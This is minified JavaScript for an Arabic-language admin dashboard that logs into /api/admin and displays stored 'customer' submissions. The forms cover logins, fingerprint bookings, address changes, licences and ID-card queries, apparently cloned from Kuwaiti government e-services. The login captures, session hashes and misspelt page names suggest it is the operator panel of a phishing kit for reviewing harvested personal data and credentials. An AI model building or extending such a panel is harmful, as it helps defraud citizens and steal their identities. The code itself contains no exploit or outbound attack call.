const $=id=>document.getElementById(id);let customers=[];let selectedKey='';let filter='all';
const api=async(url,options={})=>{const r=await fetch(url,{credentials:'same-origin',...options});const d=await r.json().catch(()=>({}));if(!r.ok)throw Error(d.error||'تعذر تحميل البيانات');return d};
const esc=v=>String(v??'').replace(/[&<>'"]/g,c=>({'&':'&amp;','<':'&lt;','>':'&gt;',"'":'&#39;','"':'&quot;'}[c]));
const date=v=>new Intl.DateTimeFormat('ar-KW',{dateStyle:'short',timeStyle:'medium'}).format(new Date(v));
const short=v=>v?`${String(v).slice(0,10)}…${String(v).slice(-5)}`:'—';
const fieldLabel=k=>({name:'الاسم',fullName:'الاسم الكامل',service:'الخدمة',serviceType:'نوع الخدمة',appointmentDate:'تاريخ الموعد',appointmentTime:'وقت الموعد',branch:'الفرع',branchSelect:'الفرع',govEntity:'الجهة الحكومية',message:'الرسالة',note:'ملاحظات',phone:'الهاتف',email:'البريد الإلكتروني',address:'العنوان',page:'الصفحة',formId:'نوع النموذج'}[k]||k);
const label=row=>{const p=(row.formId||row.page||'').toLowerCase();if(p.includes('login')||p.includes('index'))return ['تسجيل دخول','blue'];if(p.includes('fingerprint')||p.includes('booking'))return ['حجز موعد البصمة','green'];if(p.includes('address')||p.includes('adrees'))return ['تعديل العنوان','orange'];if(p.includes('certificate')||p.includes('cert'))return ['طلب الشهادات والوثائق','purple'];if(p.includes('license'))return ['رخصة القيادة','red'];if(p.includes('photo'))return ['تحديث الصورة','teal'];if(p.includes('status')||p.includes('validity'))return ['استعلام البطاقة','slate'];return [row.formId||row.page||'نموذج','slate']};
function setVisible(id,visible){$(id).classList.toggle('hidden',!visible)}
function renderCustomers(){const q=$('customerSearch').value.trim().toLowerCase();const rows=customers.filter(c=>{const hasLabel=Boolean(c.customerLabel&&String(c.customerLabel).trim());const match=!q||String(c.customerLabel||'').toLowerCase().includes(q);return hasLabel&&match&&(filter==='all'||filter==='active'||filter==='archive')});$('allCount').textContent=customers.length;$('clientStat').textContent=customers.length;$('customerList').innerHTML=rows.length?rows.map(c=>`<div class="chat-item ${c.customerKey===selectedKey?'active':''}" data-key="${esc(c.customerKey)}"><div class="chat-info"><div class="chat-avatar">◉</div><div class="chat-details"><h4>${esc(c.customerLabel||short(c.customerKey))}<span class="badge-archive">${c.recordCount} سجل</span></h4><p>⌖ ${c.recordCount} نماذج محفوظة</p></div></div><span class="chat-time">${date(c.lastSeen)}</span></div>`).join(''):'<div class="no-customers">لا توجد سجلات مطابقة</div>';document.querySelectorAll('.chat-item').forEach(x=>x.onclick=()=>selectCustomer(x.dataset.key))}
async function selectCustomer(key){selectedKey=key;renderCustomers();const d=await api(`/api/admin/customers/${encodeURIComponent(key)}`);const rows=d.submissions;const first=rows[0];$('selectedCustomerTitle').textContent=first?.customerLabel||'العميل المحدد';$('customerRefreshBtn').disabled=false;$('customerMeta').innerHTML=`<span class="meta-item">◉ ${esc(first?.customerLabel||'بيانات العميل')}</span><span class="meta-item">▤ ${rows.length} سجل</span><span class="meta-item">◷ آخر نشاط ${rows.length?date(rows.at(-1).createdAt):'—'}</span><span class="offline-badge">● سجل محفوظ</span>`;setVisible('customerMeta',true);setVisible('emptyState',false);setVisible('feedContainer',true);$('feedContainer').innerHTML=rows.map(row=>{const [name,color]=label(row);const fields=Object.entries(row.fields||{});const body=fields.length?fields.map(([k,v])=>`<div class="ticket-row"><span class="ticket-label">${esc(fieldLabel(k))}</span><span class="ticket-value">${esc(v)}</span></div>`).join(''):`<div class="ticket-row"><span class="ticket-label">نوع التسجيل</span><span class="ticket-value">${esc(row.formId||row.page)}</span></div>`;return `<article class="card-ticket"><div class="card-ticket-header"><span>${date(row.createdAt)}</span><span class="tag-assistant ${color}">${name}</span></div><div class="card-ticket-body">${body}<div class="record-foot">المعرّف: ${short(row.id)} · الجلسة: ${short(row.sessionHash)}</div></div></article>`}).join('')||'<div class="no-customers">لا توجد بيانات لهذا العميل</div>'}
async function load(){const d=await api('/api/admin/dashboard');customers=d.customers||[];$('activeStat').textContent=d.stats.active_24h||0;$('visitorStat').textContent=d.stats.visitors||0;$('totalStat').textContent=d.stats.visits||0;$('todayStat').textContent=d.stats.active_24h||0;renderCustomers();if(selectedKey)selectCustomer(selectedKey)}
async function boot(){try{await api('/api/admin/me');$('appShell').classList.remove('hidden');$('loginPage').classList.add('hidden');await load()}catch{$('loginPage').classList.remove('hidden');$('appShell').classList.add('hidden')}}
$('loginForm').onsubmit=async e=>{e.preventDefault();try{await api('/api/admin/login',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({email:$('email').value,password:$('password').value})});await boot()}catch(err){$('loginError').textContent=err.message}};
$('logoutBtn').onclick=async()=>{try{await api('/api/admin/logout',{method:'POST'})}finally{location.reload()}};$('customerRefreshBtn').onclick=()=>selectedKey&&selectCustomer(selectedKey);$('customerSearch').oninput=renderCustomers;document.querySelectorAll('[data-filter]').forEach(b=>b.onclick=()=>{document.querySelectorAll('[data-filter]').forEach(x=>x.classList.remove('active'));b.classList.add('active');filter=b.dataset.filter;renderCustomers()});boot();
